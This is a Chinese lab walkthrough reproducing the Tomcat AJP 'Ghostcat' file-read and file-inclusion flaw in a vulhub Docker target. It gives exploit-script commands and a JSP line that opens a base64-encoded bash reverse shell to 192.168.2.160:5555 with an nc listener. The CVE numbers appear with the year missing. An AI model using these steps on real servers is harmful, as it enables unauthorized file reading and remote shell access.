推荐专题：

700字范文 > Tomcat任意文件读取文件包含漏洞复现（CVE--1938/CNVD--10487）

Tomcat任意文件读取文件包含漏洞复现（CVE--1938/CNVD--10487）

时间：2023-11-29 08:45:53

相关推荐

Tomcat任意文件读取文件包含漏洞复现（CVE--1938/CNVD--10487）

Tomcat任意文件读取文件包含漏洞复现（CVE--1938）

漏洞原理

Tomcat开启了http和AJP两种协议的处理，由于“javax.servlet.include.request_uri”，“javax.servlet.include.path_info”，“javax.servlet.include.servlet_path” 这三个参数可控，所以导致文件读取以及文件包含漏洞。不过注意，可读取的文件也仅限于webapps下的目录。

为什么只能读取webapps目录下文件？

我们的请求路径中不能包含"/…/"，也就导致了该漏洞只能读取webapps目录下的文件

默认读取webapps/ROOT目录下文件，怎么读取webapps下其他目录文件？

# 请求urlreq_uri = '/asdf'# AJP协议请求中的三个属性javax.servlet.include.request_uri = '/'javax.servlet.include.path_info = 'WEB-INF/web.xml'javax.servlet.include.servlet_path = '/'

POC中还有个关键参数req_uri，这个参数的设置决定了我们可以读取webapps下其他目录的文件。设置其值为一个随意字符串’asdf’,一来是无法匹配到webapps下的路径，走tomcat默认的ROOT目录；二来是为了让tomcat将请求流到DefaultServlet，从而触发漏洞。当请求读取WEB-INF/web.xml文件，则读取的就是webapps/ROOT/WEB-INF/目录下的web.xml。

当读取webapps/manager目录下的文件，只需修改POC中req_uri参数为’manager/asdf’，读取WEB-INF/web.xml文件则是读取webapps/manager/WEB-INF/目录下的web.xml。

参考：

/t/7683

影响版本

Apache Tomcat 9.x < 9.0.31

Apache Tomcat 8.x < 8.5.51

Apache Tomcat 7.x < 7.0.100

Apache Tomcat 6.x

漏洞复现

环境：

docker环境下的vulhub靶场

任意文件读取复现（CVE--1938）

扫描目标ip 发现开放端口8009，8080

访问8080端口查看到tomcat版本为9.0.30 在CVE--1938包含版本范围内，于是猜测存在CVE--1938漏洞

使用脚本，探测漏洞

脚本地址

/hypn0s/AJPy

python2 tomcat.py --port 8009 read_file --webapp=/ROOT WEB-INF/web.xml 192.168.2.137

查看文件成功！

注意：/ROOT 目录下文件很多，在实战中如果查不到/WEB-INF/web.xml ，有可能被管理员删除了，可以换其他文件试试。或者换webapps下的其他目录。

换目录的方法：

python2 tomcat.py --port 8009 read_file --webapp=/ROOT WEB-INF/web.xml 192.168.2.137

把上面/ROOT换成图片中的目录。

文件包含（CNVD--10487）复现

如果网站中存在上传文件，并且文件保存位置在webapps目录下，则可以实现该漏洞复现。

这里vulhub靶场没有文件上传功能，于是自己登录目标靶机，手写一个文件上去

登录靶机，写入文件1.txt

docker exec -it 容器id /bin/bash //登录靶机

写入jsp语句，反弹shell代码（其中base64编码为bash -i >& /dev/tcp/192.168.2.160/5555 0>&1）

<%Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTYwLzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}");%>

注意：这里最好是在宿主机用vim写好后，拷贝到docker容器中。

使用脚本，包含文件1.txt 反弹shell

这里，先开启5555端口监听。

nc -lvnp 5555

然后使用脚本，反弹shell

脚本：

/fairyming/CVE--1938

python2 CVE--1938.py -p 8009 -f 1.txt 192.168.2.137 -c 0

python2 CVE--1938.py -p 8009 -f 1.txt 192.168.2.137 -c 1// -c 1 就是文件包含// -c 0 就是文件读取

反弹成功！

完！

免责声明：

本文属于个人笔记，仅用于学习，禁止使用于任何违法行为，任何违法行为皆与本人无关。

本内容不代表本网观点和政治立场，如有侵犯你的权益请联系我们处理。

网友评论

网友评论仅供其表达个人看法，并不表明网站立场。

相关阅读

CVE--1938 幽灵猫( GhostCat ) Tomcat-Ajp协议任意文件读取/JSP文件包含漏洞分析

2021-06-04

CNVD--10487(CVE--1938)tomcat ajp 文件读取漏洞

2024-03-17

Apache Tomcat 文件包含漏洞（CNVD--10487 对应 CVE--1938）

2023-09-20

Tomcat- AJP协议文件读取/命令执行漏洞（CVE--1938 / CNVD--10487）

2022-01-04

扩展阅读

: Apache Tomcat 曝文件包含漏洞：攻击者可利用该漏洞读取webapp目录下的任意文件

: 利用java复现 ES文件浏览器 CVE

: 任意文件上传漏洞 getshell（教程）

: 「网络安全」什么是文件包含漏洞（文件包含漏洞分类）

: tomcat学习｜DefaultServlet｜tomcat做文件服务器

: 倍福TwinCAT文件读取 VS CSharp文件读取

最近发布

四季轮回悄然绽放：感悟与思考的700字作文

2024-07-31

唱给成长的赞歌700字

2024-07-31

我爱虹霓700字作文

2024-07-31

粗心引发的祸：700字作文素材大全

2024-07-30

阅读的益处：探讨读书在我们生活中的重要性

2024-07-31

读向命运挑战有感700字作文

2024-07-31

推荐专题

成长700字以青春为话题的作文700字什么真好作文700字一件小事作文700字幸福的颜色作文700字写事作文700字幸福的味道700字作文朋友的作文700字随笔700字初中心灵的甘露作文700字议论文范文700字迟到检讨书700字童年趣事700字新学期打算700字我选择的路作文700字